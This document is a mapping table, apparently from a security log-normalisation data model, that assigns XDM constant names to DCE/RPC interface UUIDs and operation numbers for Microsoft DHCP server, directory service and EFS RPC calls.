6bffd098-a112-3610-9833-46c3f874532d:8 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_OPTION
6bffd098-a112-3610-9833-46c3f874532d:9 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_INFO
6bffd098-a112-3610-9833-46c3f874532d:10 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_INFO
6bffd098-a112-3610-9833-46c3f874532d:11 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION
6bffd098-a112-3610-9833-46c3f874532d:12 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_VALUE
6bffd098-a112-3610-9833-46c3f874532d:13 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_VALUE
6bffd098-a112-3610-9833-46c3f874532d:14 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTION_VALUES
6bffd098-a112-3610-9833-46c3f874532d:15 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION_VALUE
6bffd098-a112-3610-9833-46c3f874532d:16 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_CLIENT_INFO
6bffd098-a112-3610-9833-46c3f874532d:17 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_CLIENT_INFO
6bffd098-a112-3610-9833-46c3f874532d:18 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLIENT_INFO
6bffd098-a112-3610-9833-46c3f874532d:19 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_CLIENT_INFO
6bffd098-a112-3610-9833-46c3f874532d:20 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS
6bffd098-a112-3610-9833-46c3f874532d:21 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLIENT_OPTIONS
6bffd098-a112-3610-9833-46c3f874532d:22 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_MIB_INFO
6bffd098-a112-3610-9833-46c3f874532d:23 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTIONS
6bffd098-a112-3610-9833-46c3f874532d:24 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_VALUES
6bffd098-a112-3610-9833-46c3f874532d:25 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_SET_CONFIG
6bffd098-a112-3610-9833-46c3f874532d:26 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_GET_CONFIG
6bffd098-a112-3610-9833-46c3f874532d:27 XDM_CONST.DCERPC_OPERATION_R_DHCP_SCAN_DATABASE
6bffd098-a112-3610-9833-46c3f874532d:28 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_VERSION
6bffd098-a112-3610-9833-46c3f874532d:29 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_SUBNET_ELEMENT_V4
6bffd098-a112-3610-9833-46c3f874532d:30 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_ELEMENTS_V4
6bffd098-a112-3610-9833-46c3f874532d:31 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_SUBNET_ELEMENT_V4
6bffd098-a112-3610-9833-46c3f874532d:32 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_CLIENT_INFO_V4
6bffd098-a112-3610-9833-46c3f874532d:33 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_CLIENT_INFO_V4
6bffd098-a112-3610-9833-46c3f874532d:34 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLIENT_INFO_V4
6bffd098-a112-3610-9833-46c3f874532d:35 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS_V4
6bffd098-a112-3610-9833-46c3f874532d:36 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SUPER_SCOPE_V4
6bffd098-a112-3610-9833-46c3f874532d:37 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SUPER_SCOPE_INFO_V4
6bffd098-a112-3610-9833-46c3f874532d:38 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_SUPER_SCOPE_V4
6bffd098-a112-3610-9833-46c3f874532d:39 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_SET_CONFIG_V4
6bffd098-a112-3610-9833-46c3f874532d:40 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_GET_CONFIG_V4
6bffd098-a112-3610-9833-46c3f874532d:41 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_SET_CONFIG_VQ
6bffd098-a112-3610-9833-46c3f874532d:42 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_GET_CONFIG_VQ
6bffd098-a112-3610-9833-46c3f874532d:43 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_MIB_INFO_VQ
6bffd098-a112-3610-9833-46c3f874532d:44 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_CLIENT_INFO_VQ
6bffd098-a112-3610-9833-46c3f874532d:45 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_CLIENT_INFO_VQ
6bffd098-a112-3610-9833-46c3f874532d:46 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLIENT_INFO_VQ
6bffd098-a112-3610-9833-46c3f874532d:47 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS_VQ
6bffd098-a112-3610-9833-46c3f874532d:48 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_SUBNET_VQ
6bffd098-a112-3610-9833-46c3f874532d:49 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SUBNET_INFO_VQ
6bffd098-a112-3610-9833-46c3f874532d:50 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SUBNET_INFO_VQ
5b821720-f63b-11d0-aad2-00c04fc324db:0 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS_V5
5b821720-f63b-11d0-aad2-00c04fc324db:1 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_M_SCOPE_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:2 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_M_SCOPE_INFO
Original Mapped Description
5b821720-f63b-11d0-aad2-00c04fc324db:3 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_M_SCOPES
5b821720-f63b-11d0-aad2-00c04fc324db:4 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_M_SCOPE_ELEMENT
5b821720-f63b-11d0-aad2-00c04fc324db:5 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_M_SCOPE_ELEMENTS
5b821720-f63b-11d0-aad2-00c04fc324db:6 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_M_SCOPE_ELEMENT
5b821720-f63b-11d0-aad2-00c04fc324db:7 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_M_SCOPE
5b821720-f63b-11d0-aad2-00c04fc324db:8 XDM_CONST.DCERPC_OPERATION_R_DHCP_SCAN_M_DATABASE
5b821720-f63b-11d0-aad2-00c04fc324db:9 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_M_CLIENT_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:10 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_M_CLIENT_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:11 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_M_CLIENT_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:12 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_M_CLIENT_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:13 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_M_SCOPE_CLIENTS
5b821720-f63b-11d0-aad2-00c04fc324db:14 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_OPTION_V5
5b821720-f63b-11d0-aad2-00c04fc324db:15 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_INFO_V5
5b821720-f63b-11d0-aad2-00c04fc324db:16 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_INFO_V5
5b821720-f63b-11d0-aad2-00c04fc324db:17 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTIONS_V5
5b821720-f63b-11d0-aad2-00c04fc324db:18 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION_V5
5b821720-f63b-11d0-aad2-00c04fc324db:19 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_VALUE_V5
5b821720-f63b-11d0-aad2-00c04fc324db:20 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_VALUES_V5
5b821720-f63b-11d0-aad2-00c04fc324db:21 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_VALUE_V5
5b821720-f63b-11d0-aad2-00c04fc324db:22 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTION_VALUES_V5
5b821720-f63b-11d0-aad2-00c04fc324db:23 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION_VALUE_V5
5b821720-f63b-11d0-aad2-00c04fc324db:24 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_CLASS
5b821720-f63b-11d0-aad2-00c04fc324db:25 XDM_CONST.DCERPC_OPERATION_R_DHCP_MODIFY_CLASS
5b821720-f63b-11d0-aad2-00c04fc324db:26 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_CLASS
5b821720-f63b-11d0-aad2-00c04fc324db:27 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLASS_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:28 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_CLASSES
5b821720-f63b-11d0-aad2-00c04fc324db:29 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_ALL_OPTIONS
5b821720-f63b-11d0-aad2-00c04fc324db:30 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_ALL_OPTION_VALUES
5b821720-f63b-11d0-aad2-00c04fc324db:31 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_M_CAST_MIB_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:32 XDM_CONST.DCERPC_OPERATION_R_DHCP_AUDIT_LOG_SET_PARAMS
5b821720-f63b-11d0-aad2-00c04fc324db:33 XDM_CONST.DCERPC_OPERATION_R_DHCP_AUDIT_LOG_GET_PARAMS
5b821720-f63b-11d0-aad2-00c04fc324db:34 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_QUERY_ATTRIBUTE
5b821720-f63b-11d0-aad2-00c04fc324db:35 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_QUERY_ATTRIBUTES
5b821720-f63b-11d0-aad2-00c04fc324db:36 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_REDO_AUTHORIZATION
5b821720-f63b-11d0-aad2-00c04fc324db:37 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_SUBNET_ELEMENT_V5
5b821720-f63b-11d0-aad2-00c04fc324db:38 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_ELEMENTS_V5
5b821720-f63b-11d0-aad2-00c04fc324db:39 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_SUBNET_ELEMENT_V5
5b821720-f63b-11d0-aad2-00c04fc324db:40 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SERVER_BINDING_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:41 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SERVER_BINDING_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:42 XDM_CONST.DCERPC_OPERATION_R_DHCP_QUERY_DNS_REG_CREDENTIALS
5b821720-f63b-11d0-aad2-00c04fc324db:43 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_DNS_REG_CREDENTIALS
5b821720-f63b-11d0-aad2-00c04fc324db:44 XDM_CONST.DCERPC_OPERATION_R_DHCP_BACKUP_DATABASE
5b821720-f63b-11d0-aad2-00c04fc324db:45 XDM_CONST.DCERPC_OPERATION_R_DHCP_RESTORE_DATABASE
5b821720-f63b-11d0-aad2-00c04fc324db:46 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SERVER_SPECIFIC_STRINGS
5b821720-f63b-11d0-aad2-00c04fc324db:47 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_OPTION_V6
5b821720-f63b-11d0-aad2-00c04fc324db:48 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_INFO_V6
5b821720-f63b-11d0-aad2-00c04fc324db:49 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_INFO_V6
5b821720-f63b-11d0-aad2-00c04fc324db:50 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTIONS_V6
5b821720-f63b-11d0-aad2-00c04fc324db:51 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION_V6
5b821720-f63b-11d0-aad2-00c04fc324db:52 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_OPTION_VALUE_V6
5b821720-f63b-11d0-aad2-00c04fc324db:53 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_OPTION_VALUES_V6
5b821720-f63b-11d0-aad2-00c04fc324db:54 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_OPTION_VALUE_V6
5b821720-f63b-11d0-aad2-00c04fc324db:55 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_ALL_OPTIONS_V6
5b821720-f63b-11d0-aad2-00c04fc324db:56 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_ALL_OPTION_VALUES_V6
5b821720-f63b-11d0-aad2-00c04fc324db:57 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_SUBNET_V6
5b821720-f63b-11d0-aad2-00c04fc324db:58 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNETS_V6
5b821720-f63b-11d0-aad2-00c04fc324db:59 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_SUBNET_ELEMENT_V6
5b821720-f63b-11d0-aad2-00c04fc324db:60 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_ELEMENTS_V6
5b821720-f63b-11d0-aad2-00c04fc324db:61 XDM_CONST.DCERPC_OPERATION_R_DHCP_REMOVE_SUBNET_ELEMENT_V6
5b821720-f63b-11d0-aad2-00c04fc324db:62 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_SUBNET_V6
5b821720-f63b-11d0-aad2-00c04fc324db:63 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SUBNET_INFO_V6
5b821720-f63b-11d0-aad2-00c04fc324db:64 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS_V6
5b821720-f63b-11d0-aad2-00c04fc324db:65 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_SET_CONFIG_V6
5b821720-f63b-11d0-aad2-00c04fc324db:66 XDM_CONST.DCERPC_OPERATION_R_DHCP_SERVER_GET_CONFIG_V6
5b821720-f63b-11d0-aad2-00c04fc324db:67 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_MIB_INFO_V6
5b821720-f63b-11d0-aad2-00c04fc324db:69 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SERVER_BINDING_INFO_V6
5b821720-f63b-11d0-aad2-00c04fc324db:70 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SERVER_BINDING_INFO_V6
5b821720-f63b-11d0-aad2-00c04fc324db:71 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_CLIENT_INFO_V6
5b821720-f63b-11d0-aad2-00c04fc324db:72 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_CLIENT_INFO_V6
5b821720-f63b-11d0-aad2-00c04fc324db:73 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_CLIENT_INFO_V6
5b821720-f63b-11d0-aad2-00c04fc324db:74 XDM_CONST.DCERPC_OPERATION_R_DHCP_CREATE_CLASS_V6
5b821720-f63b-11d0-aad2-00c04fc324db:75 XDM_CONST.DCERPC_OPERATION_R_DHCP_MODIFY_CLASS_V6
5b821720-f63b-11d0-aad2-00c04fc324db:76 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_CLASS_V6
5b821720-f63b-11d0-aad2-00c04fc324db:77 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_CLASSES_V6
5b821720-f63b-11d0-aad2-00c04fc324db:78 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_OPTION_VALUE_V6
5b821720-f63b-11d0-aad2-00c04fc324db:79 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_SUBNET_DELAY_OFFER
5b821720-f63b-11d0-aad2-00c04fc324db:80 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_SUBNET_DELAY_OFFER
5b821720-f63b-11d0-aad2-00c04fc324db:81 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_MIB_INFO_V5
5b821720-f63b-11d0-aad2-00c04fc324db:82 XDM_CONST.DCERPC_OPERATION_R_DHCP_ADD_FILTER_V4
5b821720-f63b-11d0-aad2-00c04fc324db:83 XDM_CONST.DCERPC_OPERATION_R_DHCP_DELETE_FILTER_V4
5b821720-f63b-11d0-aad2-00c04fc324db:84 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_FILTER_V4
5b821720-f63b-11d0-aad2-00c04fc324db:85 XDM_CONST.DCERPC_OPERATION_R_DHCP_GET_FILTER_V4
5b821720-f63b-11d0-aad2-00c04fc324db:86 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_FILTER_V4
5b821720-f63b-11d0-aad2-00c04fc324db:87 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_DNS_REG_CREDENTIALS_V5
5b821720-f63b-11d0-aad2-00c04fc324db:88 XDM_CONST.DCERPC_OPERATION_R_DHCP_ENUM_SUBNET_CLIENTS_FILTER_STATUS_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:89 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_CREATE_RELATIONSHIP
5b821720-f63b-11d0-aad2-00c04fc324db:90 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_SET_RELATIONSHIP
5b821720-f63b-11d0-aad2-00c04fc324db:91 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_DELETE_RELATIONSHIP
5b821720-f63b-11d0-aad2-00c04fc324db:92 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_RELATIONSHIP
5b821720-f63b-11d0-aad2-00c04fc324db:93 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_ENUM_RELATIONSHIP
5b821720-f63b-11d0-aad2-00c04fc324db:94 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_ADD_SCOPE_TO_RELATIONSHIP
5b821720-f63b-11d0-aad2-00c04fc324db:95 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_DELETE_SCOPE_FROM_RELATIONSHIP
5b821720-f63b-11d0-aad2-00c04fc324db:96 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_SCOPE_RELATIONSHIP
5b821720-f63b-11d0-aad2-00c04fc324db:97 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_SCOPE_STATISTICS
5b821720-f63b-11d0-aad2-00c04fc324db:98 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_CLIENT_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:99 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_SYSTEM_TIME
5b821720-f63b-11d0-aad2-00c04fc324db:100 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_TRIGGER_ADDR_ALLOCATION
5b821720-f63b-11d0-aad2-00c04fc324db:101 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_SET_OPTION_VALUE
5b821720-f63b-11d0-aad2-00c04fc324db:102 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_SET_OPTION_VALUES
5b821720-f63b-11d0-aad2-00c04fc324db:103 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_OPTION_VALUE
5b821720-f63b-11d0-aad2-00c04fc324db:104 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_REMOVE_OPTION_VALUE
5b821720-f63b-11d0-aad2-00c04fc324db:105 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_ALL_OPTION_VALUES
5b821720-f63b-11d0-aad2-00c04fc324db:106 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_QUERY_POLICY_ENFORCEMENT
5b821720-f63b-11d0-aad2-00c04fc324db:107 XDM_CONST.DCERPC_OPERATION_R_DHCP_SET_POLICY_ENFORCEMENT
5b821720-f63b-11d0-aad2-00c04fc324db:108 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_CREATE_POLICY
5b821720-f63b-11d0-aad2-00c04fc324db:109 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_POLICY
5b821720-f63b-11d0-aad2-00c04fc324db:110 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_SET_POLICY
5b821720-f63b-11d0-aad2-00c04fc324db:111 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_DELETE_POLICY
5b821720-f63b-11d0-aad2-00c04fc324db:112 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ENUM_POLICIES
5b821720-f63b-11d0-aad2-00c04fc324db:113 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ADD_POLICY_RANGE
5b821720-f63b-11d0-aad2-00c04fc324db:114 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_REMOVE_POLICY_RANGE
5b821720-f63b-11d0-aad2-00c04fc324db:115 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ENUM_SUBNET_CLIENTS
5b821720-f63b-11d0-aad2-00c04fc324db:116 XDM_CONST.DCERPC_OPERATION_R_DHCP_V6_SET_STATELESS_STORE_PARAMS
5b821720-f63b-11d0-aad2-00c04fc324db:117 XDM_CONST.DCERPC_OPERATION_R_DHCP_V6_GET_STATELESS_STORE_PARAMS
5b821720-f63b-11d0-aad2-00c04fc324db:118 XDM_CONST.DCERPC_OPERATION_R_DHCP_V6_GET_STATELESS_STATISTICS
5b821720-f63b-11d0-aad2-00c04fc324db:119 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ENUM_SUBNET_RESERVATIONS
5b821720-f63b-11d0-aad2-00c04fc324db:120 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_FREE_IP_ADDRESS
5b821720-f63b-11d0-aad2-00c04fc324db:121 XDM_CONST.DCERPC_OPERATION_R_DHCP_V6_GET_FREE_IP_ADDRESS
5b821720-f63b-11d0-aad2-00c04fc324db:122 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_CREATE_CLIENT_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:123 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_CLIENT_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:124 XDM_CONST.DCERPC_OPERATION_R_DHCP_V6_CREATE_CLIENT_INFO
5b821720-f63b-11d0-aad2-00c04fc324db:125 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_FAILOVER_GET_ADDRESS_STATUS
5b821720-f63b-11d0-aad2-00c04fc324db:126 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_CREATE_POLICY_EX
5b821720-f63b-11d0-aad2-00c04fc324db:127 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_POLICY_EX
5b821720-f63b-11d0-aad2-00c04fc324db:128 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_SET_POLICY_EX
5b821720-f63b-11d0-aad2-00c04fc324db:129 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ENUM_POLICIES_EX
5b821720-f63b-11d0-aad2-00c04fc324db:130 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_ENUM_SUBNET_CLIENTS_EX
5b821720-f63b-11d0-aad2-00c04fc324db:131 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_CREATE_CLIENT_INFO_EX
5b821720-f63b-11d0-aad2-00c04fc324db:132 XDM_CONST.DCERPC_OPERATION_R_DHCP_V4_GET_CLIENT_INFO_EX
7c44d7d4-31d5-424c-bd5e-2b3e1f323d22:0 XDM_CONST.DCERPC_OPERATION_IDLDSA_PREPARE_SCRIPT
7c44d7d4-31d5-424c-bd5e-2b3e1f323d22:1 XDM_CONST.DCERPC_OPERATION_IDLDSA_EXECUTE_SCRIPT
77df7a80-f298-11d0-8358-00a024c480a8:0 XDM_CONST.DCERPC_OPERATION_SDS_CREATE_OBJECT
77df7a80-f298-11d0-8358-00a024c480a8:1 XDM_CONST.DCERPC_OPERATION_SDS_DELETE_OBJECT
77df7a80-f298-11d0-8358-00a024c480a8:2 XDM_CONST.DCERPC_OPERATION_SDS_GET_PROPS
77df7a80-f298-11d0-8358-00a024c480a8:3 XDM_CONST.DCERPC_OPERATION_SDS_SET_PROPS
77df7a80-f298-11d0-8358-00a024c480a8:4 XDM_CONST.DCERPC_OPERATION_SDS_GET_OBJECT_SECURITY
77df7a80-f298-11d0-8358-00a024c480a8:5 XDM_CONST.DCERPC_OPERATION_SDS_SET_OBJECT_SECURITY
77df7a80-f298-11d0-8358-00a024c480a8:6 XDM_CONST.DCERPC_OPERATION_SDS_LOOKUP_BEGIN
77df7a80-f298-11d0-8358-00a024c480a8:7 XDM_CONST.DCERPC_OPERATION_SDS_LOOKUP_NEXT
77df7a80-f298-11d0-8358-00a024c480a8:8 XDM_CONST.DCERPC_OPERATION_SDS_LOOKUP_END
77df7a80-f298-11d0-8358-00a024c480a8:10 XDM_CONST.DCERPC_OPERATION_SDS_DELETE_OBJECT_GUID
77df7a80-f298-11d0-8358-00a024c480a8:11 XDM_CONST.DCERPC_OPERATION_SDS_GET_PROPS_GUID
77df7a80-f298-11d0-8358-00a024c480a8:12 XDM_CONST.DCERPC_OPERATION_SDS_SET_PROPS_GUID
77df7a80-f298-11d0-8358-00a024c480a8:13 XDM_CONST.DCERPC_OPERATION_SDS_GET_OBJECT_SECURITY_GUID
77df7a80-f298-11d0-8358-00a024c480a8:14 XDM_CONST.DCERPC_OPERATION_SDS_SET_OBJECT_SECURITY_GUID
77df7a80-f298-11d0-8358-00a024c480a8:19 XDM_CONST.DCERPC_OPERATION_SDSQM_SET_MACHINE_PROPERTIES
77df7a80-f298-11d0-8358-00a024c480a8:20 XDM_CONST.DCERPC_OPERATION_SDS_CREATE_SERVERS_CACHE
77df7a80-f298-11d0-8358-00a024c480a8:21 XDM_CONST.DCERPC_OPERATION_SDSQM_GET_OBJECT_SECURITY
77df7a80-f298-11d0-8358-00a024c480a8:22 XDM_CONST.DCERPC_OPERATION_SDS_VALIDATE_SERVER
77df7a80-f298-11d0-8358-00a024c480a8:23 XDM_CONST.DCERPC_OPERATION_SDS_CLOSE_SERVER_HANDLE
77df7a80-f298-11d0-8358-00a024c480a8:27 XDM_CONST.DCERPC_OPERATION_SDS_GET_SERVER_PORT
708cca10-9569-11d1-b2a5-0060977d8118:0 XDM_CONST.DCERPC_OPERATION_SDS_GET_COMPUTER_SITES
708cca10-9569-11d1-b2a5-0060977d8118:1 XDM_CONST.DCERPC_OPERATION_SDS_GET_PROPS_EX
708cca10-9569-11d1-b2a5-0060977d8118:2 XDM_CONST.DCERPC_OPERATION_SDS_GET_PROPS_GUID_EX
708cca10-9569-11d1-b2a5-0060977d8118:3 XDM_CONST.DCERPC_OPERATION_SDS_BEGIN_DELETE_NOTIFICATION
708cca10-9569-11d1-b2a5-0060977d8118:4 XDM_CONST.DCERPC_OPERATION_SDS_NOTIFY_DELETE
708cca10-9569-11d1-b2a5-0060977d8118:5 XDM_CONST.DCERPC_OPERATION_SDS_END_DELETE_NOTIFICATION
708cca10-9569-11d1-b2a5-0060977d8118:6 XDM_CONST.DCERPC_OPERATION_SDS_IS_SERVER_GC
708cca10-9569-11d1-b2a5-0060977d8118:8 XDM_CONST.DCERPC_OPERATION_SDS_GET_GC_LIST_IN_DOMAIN
df1941c5-fe89-4e79-bf10-463657acf44d:0 XDM_CONST.DCERPC_OPERATION_EFS_RPC_OPEN_FILE_RAW
df1941c5-fe89-4e79-bf10-463657acf44d:1 XDM_CONST.DCERPC_OPERATION_EFS_RPC_READ_FILE_RAW
df1941c5-fe89-4e79-bf10-463657acf44d:2 XDM_CONST.DCERPC_OPERATION_EFS_RPC_WRITE_FILE_RAW
df1941c5-fe89-4e79-bf10-463657acf44d:3 XDM_CONST.DCERPC_OPERATION_EFS_RPC_CLOSE_RAW
df1941c5-fe89-4e79-bf10-463657acf44d:4 XDM_CONST.DCERPC_OPERATION_EFS_RPC_ENCRYPT_FILE_SRV
df1941c5-fe89-4e79-bf10-463657acf44d:5 XDM_CONST.DCERPC_OPERATION_EFS_DECRYPT_FILE_SRV
df1941c5-fe89-4e79-bf10-463657acf44d:6 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_USERS_ON_FILE
df1941c5-fe89-4e79-bf10-463657acf44d:7 XDM_CONST.DCERPC_OPERATION_EFS_RPC_QUERY_RECOVERY_AGENTS
df1941c5-fe89-4e79-bf10-463657acf44d:8 XDM_CONST.DCERPC_OPERATION_EFS_RPC_REMOVE_USERS_FROM_FILE
